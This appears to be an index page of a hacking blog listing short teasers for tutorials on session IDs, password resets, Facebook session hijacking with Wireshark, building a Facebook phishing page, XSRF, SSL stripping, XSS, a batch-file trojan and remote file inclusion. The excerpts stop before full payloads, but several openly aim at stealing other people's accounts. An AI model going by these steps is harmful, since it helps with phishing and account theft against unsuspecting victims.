Session ID Analysis

In this tutorial we focus on session ID analysis. If you are not familiar with session ID’s I’ll do a quick explanation. HTTP is a stateless protocol, so it’s equivalent to walkie talkies or CB radios. You’ll send a request and wait for a reply, you don’t have a constantly open communication line as you would with a phone. So in order to emulate this open communication the HTTP protocol uses session ID’s, commonly known as cookies. These cookies are simply agreements between you and the web application that you are who you claim to be. Once you have exchanged your cookie with the website you can then talk back and forth as long as the cookie is tied to your communication. So there’s the quick and dirty intro to session ID’s. So the next logical question is how does this session ID process work or even better how should it work? Let’s use a web mail application as an example:

1. You login to your web mail account
2. Your web mail provider sends you a “random” cookie that is tied to your login session
3. Each time you click on a new message within your Inbox your cookie is sent along to validate who you claim to be, that way you’ll get your next message and not another person’s message.

Read More

Speaking Leet : Language of Hackers

To speak leet, you more or less need to un-learn proper english. The history of leet goes back to the early days of online message boards, or forums, where users can post messages to carry on a threaded conversation. In an attempt to “Clean-Up” the language that users would sometimes post, admins added a filtering system to the message board which would replace restricted words with some type of alternative. For example, the word “crap” might become “crud.” It didn’t take people long to figure out that you could get around this filter simply by altering the original word somehow, like changing “crap” to “c-r-a-p” or “krap” or “crrrap.” it was soon obvious that these filtering systems could never possibly cover every variation because people would just keep inventing new ones, and so leet was born.

Read More

How to find or remove the Virus ?

How to find or remove the Virus ?
If you’ve let your guard down–or even if you haven’t–it can be hard to tell if your PC is infected. Here’s what to do if you suspect the worst.
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.
You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you’ve put off renewing.
It happens. It’s nothing to be ashamed of. But chances are, either you’re infected right now, as we speak, or you will be very soon.

Read More

Resetting Ubuntu 11.10 Password

Hey Guys,
If you’ve forgotten your Ubuntu 11.10 Password you can reset it within minutes. I will tell you two methods to reset your Ubuntu Password. The first one is by booting it in recovery mode and second one is by using any Live OS.

Let’s start with the recovery mode first as it takes less time and easy to do in comparison to the second one method:

Boot up your Ubuntu. Press and Hold ‘Shift’ Key while the machine is booting. You will get the GRUB Menu like this:



Select the second option which is ‘Recovery Mode’ and press Enter. After pressing enter system will start booting and you will get a list of options like this:

Read More

Internet Access In Backtrack Virtual Machine

Hey Guys,
I’ve found that some people are struggling hard to access internet in there backtrack virtual machine from their USB Modem, so today I am going to tell you how you can access internet in your virtual machine by your datacard.
Open Network Adapter Settings ( Run -> ncpa.cpl )
Right Click on your USB Modem Adapter and go to properties.

Read More

Cracking Linux Password when Grub cannot be changed

in the previous post we learnt about cracking Linux Password using the Grub – Dropping to Single User Mode. However, if the Grub is password protected, then this method will not work. So in such cases, we can use the Linux Live CD to crack the Linux Password. Follow the below given steps to change the Linux Password, using the Linux Live CD.

1. Boot your computer from your Linux Live CD, choosing “Try Linux without any change to your computer” from the boot menu.

Read More

BackTrack 5 Released – The Most Advanced Linux Security Distribution & LiveCD

We have of course been following BackTrack since the very early days, way back in 2006 when it was just known as BackTrack – A merger between WHAX and Auditor.  They’ve come a long way and BackTrack is now a very polished and well rounded security distro, most of the others have dropped off the map leaving BackTrack as the giant in the security LiveCD space.
The last major release was BackTrack Final 4 Released – Linux Security Distribution – back in January 2010.

The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution” – they released it on May 10th. This new revision has been built from scratch, and boasts several major improvements over all our previous releases. It’s based on Ubuntu Lucid LTS – Kernel 2.6.38, patched with all relevant wireless injection patches. Fully open source and GPL compliant.

Read More

How To Hack Facebook Account Using Wireshark

In this tutorial we will have out look on how you can hack facebook account using wireshark. First of all I must clear you even though you'll get access to victim's account you'll not get his/her password, next this trick will work only on LAN with hub. It will also work on LAN with switch but you'll have to perform ARP poisoning, click on link to know more.
Here surely I 'll not discus how to use wireshark please read our previous tutorials to know how to use wireshark.

For this hack you'll need wireshark which is a packet sniffing tool, Mozilla Firefox web browser and add n edit add-on for Mozilla Firefox. Now I assume you have all above components for hacking facebook and you are connected in a hub based LAN or LAN which has been ARP poisoned. So now click on capture button and start capturing packets.

Read More

What Is Phishing

Here in this post we will discus a little about what is phishing. Please note what we are covering here is just basics and not a phishing tutorial. In phishing attack, an attacker creates a fake login page of a legitimate website and lures victim to login using it. The site under attack is known as phished site and the fake login page used for capturing or stealing information is known as phished page. To perform phishing attack an attacker performs following steps,

First of all he gets a free web host and then selects a domain which somehow resembles the site he wants to phish. For example to hack Gmail password he/she may select domain like Gmial. Look carefully both words appear nearly similar when just overlooked and that is where an attacker makes a catch.

Read More

How To Hack Facebook Account | Phishing

In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
.

First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.

Read More

JSON XSRF Attacks

Welcome to another episode of Cross Site Request Forgery Attacks on DEVILS BLOG ON SECURITY. In this post we will discus a little about JSON hacking. Now you might have question why we haven't covered JSON XSRF attacks along with other XSRF attacks. This question is little difficult to answer but here's my explanation. All other XSRF attacks usually depend on session management attacks in one or another way, directly or indirectly XSRF attacks can be called as derivative obtained by adding and integrating Session Management Attacks, Frame Injection Flaws and Cross Site Scripting whereas the case is little different in JSON XSRF attacks. Many professionals even object inclusion of JSON attack as XSRF attack but we have nothing to do with it. So lets see how JSON XSRF attacks are different from other XSRF attacks.

Read More

JSON XSRF Attacks

In our last post on JSON XSRF attacks we saw some basics about XSRF attacks. So now in this section we will have our look on how to find and exploit JSON vulnerability for attack. As told in previous post JSON vulnerability exists when JSON data transfer format is used instead of standard XML data transfer format and that happens only in AJAX based web applications so following are your steps to find out whether a site is vulnerable or not.

• If the web application is running on AJAX then check for response type of application for JSON format or Java Script.
• Now determine whether a cross domain request can be made from it or not. If yes, check for transferred parameters, if they are same for each request or they are predictable then web application is vulnerable
  
  

Read More

SSL And TLS Attacks | SSL Man In The Middle

In our last post we discussed a little about attacking weak ciphers in this post we will have our look on how a Man In The Middle (MITM) attacks can be performed over SSL and TSL encrypted data transfer. The attack uses SSL strip developed by Moxie Marlin Spike with a ARP spoofing tool and a packet sniffer. The attack can be exclusively performed from UNIX and Linux based platforms hence I suggest you to use Dsniff. Practically SSL strip was developed to demonstrate how an attacker can lead visitors to visit his/her site from legitimate site. The attack used misinterpretation of null characters vulnerability which existed in several certificates during 2009.

I think its not good to demonstrate how attack can be performed since Moxie Marlin Spike has already provided a nice tutorial on his own website with a video. 

Read More

Cross Site Scripting (XSS) | The Basics

---

In this following post we will have some basic look over Cross Site Scripting. Cross site scripting is also known as XSS and many times people also abbreviate it as CSS (by the way CSS means Cascading Style Sheets). Commonly XSS is web application attack and not web server attack, it occurs in web application which accepts input without validation and sanitization resulting giving an attacker chance to run a malicious script. XSS vulnerability occurs in a web application due to dynamic nature of a web page which is attained by Java Scripts, VB Scripts, ActiveX controls, Flash contents and scripts and sometimes with help of HTML too.

Read More

Making your own trojan in a .bat file

Open a dos prompt we will only need a dos prompt , and windows xp…

-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

Read More

Hack a Website Using Remote File Inclusion

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

Read More